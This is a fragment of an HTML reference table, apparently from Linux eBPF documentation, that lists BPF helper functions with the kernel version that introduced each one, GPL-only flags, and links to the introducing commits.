<tr><td><code>BPF_FUNC_map_lookup_elem()</code></td><td>3.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d0003ec01c667b731c139e23de3306a8b328ccf5"><code>d0003ec01c66</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_lookup_percpu_elem()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/07343110b293456d30393e89b86c4dee1ac051c8"><code>07343110b293</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_peek_elem()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_pop_elem()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_push_elem()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92"><code>f1a2e44a3aec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_update_elem()</code></td><td>3.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d0003ec01c667b731c139e23de3306a8b328ccf5"><code>d0003ec01c66</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_apply_bytes()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2a100317c9ebc204a166f16294884fbf9da074ce"><code>2a100317c9eb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_cork_bytes()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91843d540a139eb8070bcff8aa10089164436deb"><code>91843d540a13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_pop_data()</code></td><td>5.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7246d8ed4dcce23f7509949a77be15fa9f0e3d28"><code>7246d8ed4dcc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_pull_data()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/015632bb30daaaee64e1bcac07570860e0bf3092"><code>015632bb30da</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_push_data()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6fff607e2f14bd7c63c06c464a6f93b8efbabe28"><code>6fff607e2f14</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_redirect_hash()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_msg_redirect_map()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4f738adba30a7cfc006f605707e7aee847ffefa0"><code>4f738adba30a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_per_cpu_ptr()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/eaa6bcb71ef6ed3dc18fc525ee7e293b06b4882b"><code>eaa6bcb71ef6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_perf_event_output()</code></td><td>4.4</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/a43eec304259a6c637f4014a6d4767159b6a3aa3"><code>a43eec304259</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_perf_event_read()</code></td><td>4.3</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/35578d7984003097af2b1e34502bc943d40c1804"><code>35578d798400</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_perf_event_read_value()</code></td><td>4.15</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/908432ca84fc229e906ba164219e9ad0fe56f755"><code>908432ca84fc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_perf_prog_read_value()</code></td><td>4.15</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/4bebdc7a85aa400c0222b5329861e4ad9252f1e5"><code>4bebdc7a85aa</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read()</code></td><td>4.1</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/2541517c32be2531e0da59dfd7efc1ce844644f5"><code>2541517c32be</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_kernel()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_kernel_str()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_user()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_user_str()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_str()</code></td><td>4.11</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/a5e8c07059d0f0b31737408711d44794928ac218"><code>a5e8c07059d0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_write_user()</code></td><td>4.8</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/96ae52279594470622ff0585621a13e96b700600"><code>96ae52279594</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_rc_keydown()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_rc_pointer_rel()</code></td><td>5.0</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/01d3240a04f4c09392e13c77b54d4423ebce2d72"><code>01d3240a04f4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_rc_repeat()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_read_branch_records()</code></td><td>5.6</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/fff7b64355eac6e29b50229ad1512315bc04b44e"><code>fff7b64355ea</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect()</code></td><td>4.4</td><td></td><td><a href="https://github.com/torvalds/linux/commit/27b29f63058d26c6c1742f1993338280d5a41dc6"><code>27b29f63058d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect_map()</code></td><td>4.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/97f91a7cf04ff605845c20948b8a80e54cbd3376"><code>97f91a7cf04f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect_neigh()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b4ab31414970a7a03a5d55d75083f2c101a30592"><code>b4ab31414970</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect_peer()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/9aa1206e8f48222f35a0c809f33b2f4aaa1e2661"><code>9aa1206e8f48</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_reserve_hdr_opt()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0813a841566f0962a5551be7749b43c45f0022a0"><code>0813a841566f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_discard()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_discard_dynptr()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bc34dee65a65e9c920c420005b8a43f2a721a458"><code>bc34dee65a65</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_output()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_query()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_reserve()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_reserve_dynptr()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bc34dee65a65e9c920c420005b8a43f2a721a458"><code>bc34dee65a65</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_submit()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_submit_dynptr()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bc34dee65a65e9c920c420005b8a43f2a721a458"><code>bc34dee65a65</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_send_signal()</code></td><td>5.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8b401f9ed2441ad9e219953927a842d24ed051fc"><code>8b401f9ed244</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_send_signal_thread()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8482941f09067da42f9c3362e15bfb3f3c19d610"><code>8482941f0906</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_seq_printf()</code></td><td>5.7</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/492e639f0c222784e2e0f121966375f641c61b15"><code>492e639f0c22</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_seq_printf_btf()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/eb411377aed9e27835e77ee0710ee8f4649958f3"><code>eb411377aed9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_seq_write()</code></td><td>5.7</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/492e639f0c222784e2e0f121966375f641c61b15"><code>492e639f0c22</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_set_hash()</code></td><td>4.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ded092cd73c2c56a394b936f86897f29b2e131c0"><code>ded092cd73c2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_set_hash_invalid()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7a4b28c6cc9ffac50f791b99cc7e46106436e5d8"><code>7a4b28c6cc9f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_set_retval()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b44123b4a3dcad4664d3a0f72c011ffd4c9c4d93"><code>b44123b4a3dc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_setsockopt()</code></td><td>4.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8c4b4c7e9ff0447995750d9329949fa082520269"><code>8c4b4c7e9ff0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_ancestor_cgroup_id()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f307fa2cb4c935f7f1ff0aeb880c7b44fb9a642b"><code>f307fa2cb4c9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_assign()</code></td><td>5.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cf7fbe660f2dbd738ab58aea8e9b0ca6ad232449"><code>cf7fbe660f2d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_cgroup_id()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f307fa2cb4c935f7f1ff0aeb880c7b44fb9a642b"><code>f307fa2cb4c9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_fullsock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/46f8bc92758c6259bcf945e9216098661c1587cd"><code>46f8bc92758c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_lookup_tcp()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc9b432e6714d72d7d77ec7c27f6f8358d0c71"><code>6acc9b432e67</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_lookup_udp()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc9b432e6714d72d7d77ec7c27f6f8358d0c71"><code>6acc9b432e67</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_redirect_hash()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_redirect_map()</code></td><td>4.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/174a79ff9515f400b9a6115643dafd62a635b7e6"><code>174a79ff9515</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_release()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc9b432e6714d72d7d77ec7c27f6f8358d0c71"><code>6acc9b432e67</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_select_reuseport()</code></td><td>4.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2dbb9b9e6df67d444fbe425c7f6014858d337adf"><code>2dbb9b9e6df6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_storage_delete()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6ac99e8f23d4b10258406ca0dd7bffca5f31da9d"><code>6ac99e8f23d4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_storage_get()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6ac99e8f23d4b10258406ca0dd7bffca5f31da9d"><code>6ac99e8f23d4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_adjust_room()</code></td><td>4.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2be7e212d5419a400d051c84ca9fdd083e5aacac"><code>2be7e212d541</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_ancestor_cgroup_id()</code></td><td>4.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7723628101aaeb1d723786747529b4ea65c5b5c5"><code>7723628101aa</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_head()</code></td><td>4.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_proto()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6578171a7ff0c31dc73258f93da7407510abf085"><code>6578171a7ff0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_tail()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/5293efe62df81908f2e90c9820c7edcc8e61f5e9"><code>5293efe62df8</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_type()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d2485c4242a826fdf493fd3a27b8b792965b9b9e"><code>d2485c4242a8</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_cgroup_classid()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b426ce83baa7dff947fb354118d3133f2953aac8"><code>b426ce83baa7</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_cgroup_id()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cb20b08ead401fd17627a36f035c0bf5bfee5567"><code>cb20b08ead40</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_ecn_set_ce()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f7c917ba11a67632a8452ea99fe132f626a7a2cc"><code>f7c917ba11a6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_get_tunnel_key()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d3aa45ce6b94c65b83971257317867db13e5f492"><code>d3aa45ce6b94</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_get_tunnel_opt()</code></td><td>4.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/14ca0751c96f8d3d0f52e8ed3b3236f8b34d3460"><code>14ca0751c96f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_get_xfrm_state()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/12bed760a78da6e12ac8252fec64d019a9eac523"><code>12bed760a78d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_load_bytes()</code></td><td>4.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/05c74e5e53f6cb07502c3e6a820f33e2777b6605"><code>05c74e5e53f6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_load_bytes_relative()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e1ec56cdc59746943b2acfab3c171b930187bbe"><code>4e1ec56cdc59</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_output()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/a7658e1a4164ce2b9eb4a11aadbba38586e93bd6"><code>a7658e1a4164</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_pull_data()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/36bbef52c7eb646ed6247055a2acd3851e317857"><code>36bbef52c7eb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_set_tstamp()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/9bb984f28d5bcb917d35d930fcfb89f90f9449fd"><code>9bb984f28d5b</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_set_tunnel_key()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d3aa45ce6b94c65b83971257317867db13e5f492"><code>d3aa45ce6b94</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_set_tunnel_opt()</code></td><td>4.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/14ca0751c96f8d3d0f52e8ed3b3236f8b34d3460"><code>14ca0751c96f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_store_bytes()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91bc4822c3d61b9bb7ef66d3b77948a4f9177954"><code>91bc4822c3d6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_under_cgroup()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4a482f34afcc162d8456f449b137ec2a95be60d8"><code>4a482f34afcc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_vlan_pop()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e10df9a60d96ced321dd2af71da558c6b750078"><code>4e10df9a60d9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_vlan_push()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e10df9a60d96ced321dd2af71da558c6b750078"><code>4e10df9a60d9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_lookup_tcp()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/edbf8c01de5a104a71ed6df2bf6421ceb2836a8e"><code>edbf8c01de5a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_mptcp_sock()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3bc253c2e652cf5f12cd8c00d80d8ec55d67d1a7"><code>3bc253c2e652</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/478cfbdf5f13dfe09cfd0b1cbac821f5e27f6108"><code>478cfbdf5f13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp_request_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/478cfbdf5f13dfe09cfd0b1cbac821f5e27f6108"><code>478cfbdf5f13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp_timewait_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/478cfbdf5f13dfe09cfd0b1cbac821f5e27f6108"><code>478cfbdf5f13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp6_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/af7ec13833619e17f03aa73a785a2f871da6d66b"><code>af7ec1383361</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_udp6_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0d4fad3e57df2bf61e8ffc8d12a34b1caf9b8835"><code>0d4fad3e57df</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_unix_sock()</code></td><td>5.16</td><td></td><td><a href="https://github.com/torvalds/linux/commit/9eeb3aa33ae005526f672b394c1791578463513f"><code>9eeb3aa33ae0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_snprintf()</code></td><td>5.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7b15523a989b63927c2bb08e9b5b0bbc10b58bef"><code>7b15523a989b</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_snprintf_btf()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c4d0bfb45068d853a478b9067a95969b1886a30f"><code>c4d0bfb45068</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_from_file()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4f19cab76136e800a3f04d8c9aa4d8e770e3d3d8"><code>4f19cab76136</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_hash_update()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_map_update()</code></td><td>4.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/174a79ff9515f400b9a6115643dafd62a635b7e6"><code>174a79ff9515</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_spin_lock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d83525ca62cf8ebe3271d14c36fb900c294274a2"><code>d83525ca62cf</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_spin_unlock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d83525ca62cf8ebe3271d14c36fb900c294274a2"><code>d83525ca62cf</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_store_hdr_opt()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0813a841566f0962a5551be7749b43c45f0022a0"><code>0813a841566f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_strncmp()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c5fb19937455095573a19ddcbff32e993ed10e35"><code>c5fb19937455</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_strtol()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d7a4cb9b6705a89937d12c8158a35a3145dc967a"><code>d7a4cb9b6705</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_strtoul()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d7a4cb9b6705a89937d12c8158a35a3145dc967a"><code>d7a4cb9b6705</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sys_bpf()</code></td><td>5.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/79a7f8bdb159d9914b58740f3d31d602a6e4aca8"><code>79a7f8bdb159</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sys_close()</code></td><td>5.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3abea089246f76c1517b054ddb5946f3f1dbd2c0"><code>3abea089246f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_get_current_value()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/1d11b3016cec4ed9770b98e82a61708c8f4926e7"><code>1d11b3016cec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_get_name()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/808649fb787d918a48a360a668ee4ee9023f0c11"><code>808649fb787d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_get_new_value()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e63acdff864654cee0ac5aaeda3913798ee78f6"><code>4e63acdff864</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_set_new_value()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e63acdff864654cee0ac5aaeda3913798ee78f6"><code>4e63acdff864</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tail_call()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/04fd61ab36ec065e194ab5e74ae34a5240d992bb"><code>04fd61ab36ec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_task_pt_regs()</code></td><td>5.15</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/dd6e10fbd9fb86a571d925602c8a24bb4d09a2a7"><code>dd6e10fbd9fb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_task_storage_delete()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4cf1bc1f10452065a29d576fc5693fc4fab5b919"><code>4cf1bc1f1045</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_task_storage_get()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4cf1bc1f10452065a29d576fc5693fc4fab5b919"><code>4cf1bc1f1045</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_check_syncookie()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/399040847084a69f345e0a52fd62f04654e0fce3"><code>399040847084</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_gen_syncookie()</code></td><td>5.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/70d66244317e958092e9c971b08dd5b7fd29d9cb#diff-05da4bf36c7fbcd176254e1615d98b28"><code>70d66244317e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_check_syncookie_ipv4()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_check_syncookie_ipv6()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_gen_syncookie_ipv4()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_gen_syncookie_ipv6()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_send_ack()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/206057fe020ac5c037d5e2dd6562a9bd216ec765"><code>206057fe020a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_sock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/655a51e536c09d15ffa3603b1b6fce2b45b85a1f"><code>655a51e536c0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_this_cpu_ptr()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/63d9b80dcf2c67bc5ade61cbbaa09d7af21f43f1"><code>63d9b80dcf2c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_timer_init()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
